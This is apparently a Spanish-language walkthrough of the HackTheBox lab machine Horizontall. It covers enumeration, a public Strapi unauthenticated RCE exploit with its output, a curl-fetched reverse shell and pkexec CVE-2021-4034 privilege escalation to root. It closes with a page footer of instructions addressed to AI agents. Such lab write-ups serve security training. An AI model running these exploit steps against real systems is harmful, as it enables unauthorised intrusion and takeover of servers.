# Horizontall
Sobre esta maquina: HTB
Sistema Operativo: Linux
**Skills Usados**:
* Information Leakage
* Port Forwarding
* Strapi CMS Exploitation
* Laravel Exploitation
Metodologia:
Hacemos el primer escaneo del target.
```
//
nmap -T3 -sS -n -v 10.10.11.105 -oN first_scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-27 20:05 EDT
Initiating Ping Scan at 20:05
Nmap scan report for 10.10.11.105
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds
Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.048KB)
Escaneo de servicios y ejecucion de scripts
❯ nmap -sC -sV -T3 -sS -n -p22,80 -v 10.10.11.105 -oN SC_scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-27 20:07 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:07
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50
ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
|http-server-header: nginx/1.14.0 (Ubuntu)
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Revisamos lo que corre en el puerto 80 .
no muestra nada quizás por virtual hosting
Intentamos agregar el host a nostro etc/host para lograr ver algo
```
//
nvim /etc/hosts
```
Observamos ahora si el sitio web
hacemos fuerza bruta con gobuster para enumerar subdominios.
```
//
❯ gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://horizontall.htb/ -z -t 200
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: http://horizontall.htb/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: false
Starting gobuster in VHOST enumeration mode
===============================================================
found: api-prod.horizontall.htb
```
visitamos el subdominio primero cargándolo a nuestro etc/hosts/
Enumeramos subdominios del mismo usando gobuster.
```
//
❯ gobuster dir -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://api-prod.horizontall.htb -t 50 -z
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: http://api-prod.horizontall.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
Starting gobuster in directory enumeration mode
/admin (Status: 200) [Size: 854]
/users (Status: 403) [Size: 60]
/reviews (Status: 200) [Size: 507]
```
revisamos los subdominios encontrados, en el /reviews, encontramos un codigo json interesante.
obtuvimos algunos nombres de usuarios
ahora con searchsploit intentaremos conseguir alguna vulnerabilidad para Strapi.
```
//
searchsploit strapi
Exploit Title | Path
Strapi 3.0.0-beta - Set Password (Unauthenticated) | multiple/webapps/50237.py
Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated) | multiple/webapps/50238.py
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) | multiple/webapps/50239.py
Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit) | nodejs/webapps/50716.rb
```
Guardamos el exploit que mas nos gusto en este caso el 50239, cambiamos su nombre y lo ejecutamos.
```
//
searchsploit -m multiple/webapps/50239.py
❯ python3 strapy.explout.py
[-] Wrong number of arguments provided
[*] Usage: python3 exploit.py
❯ python3 strapy.explout.py http://api-prod.horizontall.htb
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNzQ1ODAyOTUwLCJleHAiOjE3NDgzOTQ5NTB9.DJvjPjeiRDNxOatzY6tWiJTxhjKp-60AWINFYtHGBRk
```
Comprobamos credenciales e INGRESAMOS EXITOSAMENTE .
Comprobamos si podemos inyectar comandos de forma remota desde la terminal.
```
//
❯$> whoami
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
{"statusCode":400,"error":"Bad Request","message":[{"messages":[{"id":"An error occurred"}]}]}
```
no nos dejo con NC pero nos fijamos que si nos deja ejecutar CURL, asi que intentaremos crear un index html y montar un servidor sencillo en python que nos permita hacer , que al ejectuar el index con curl en la maquina victima se nos envie una reverse shell estando en escucha .
Buscamos la Flag.
```
//
strapi@horizontall:~/myapi$ cd /home
strapi@horizontall:/home$ ls
developer
strapi@horizontall:/home$ cd developer
strapi@horizontall:/home/developer$ ls
composer-setup.php
myproject
user.txt
strapi@horizontall:/home/developer$ cat user.txt
a7493a7702747ee7f8b4300f17a9a1fa
```
Conseguimos la primera flag y ahora buscamos escalar privilegios.
Buscamos alternativas para hacer escalada de privilegios y encontramos lo siguiente:
```
//
trapi@horizontall:/home/developer$ which pkexec
/usr/bin/pkexec
Tiene pkexec y el comando make
lo que nos permitira ejecutar una CVE ya conocida
Ingresamos en los archivos temporales
strapi@horizontall:/home/developer$ cd /tmp/
Clonamos el CVE en nuestra maquina (no la victima)
para explotar la vulnerabilidad
git clone https://github.com/berdav/CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56 (from 1)
Receiving objects: 100% (92/92), 22.71 KiB | 394.00 KiB/s, done.
Resolving deltas: 100% (44/44), done.
Comrpimimos el exploit para mandarlo a la maquina victima
zip -r comprimido.zip CVE-2021-4034/
```
una vez comprimido el exploit habilitamos nuevamente el servidor python y desde la maquina victima con wget aceptamos la petición, descomprimimos el CVE hacemos make y ejectumos el exploit.
y hemos ganado acceso a root, ahora buscamos la ultima flag.
```
//
cd /root
ls
boot.sh
pid
restart.sh
root.txt
cat root.txt
86dc856f7d9e662dced3806d29391a9d
```
Y así damos por concluida esta maquina.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://henrys-writeups.gitbook.io/owo/maquinas-vulneradas/hackthebox/horizontall.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.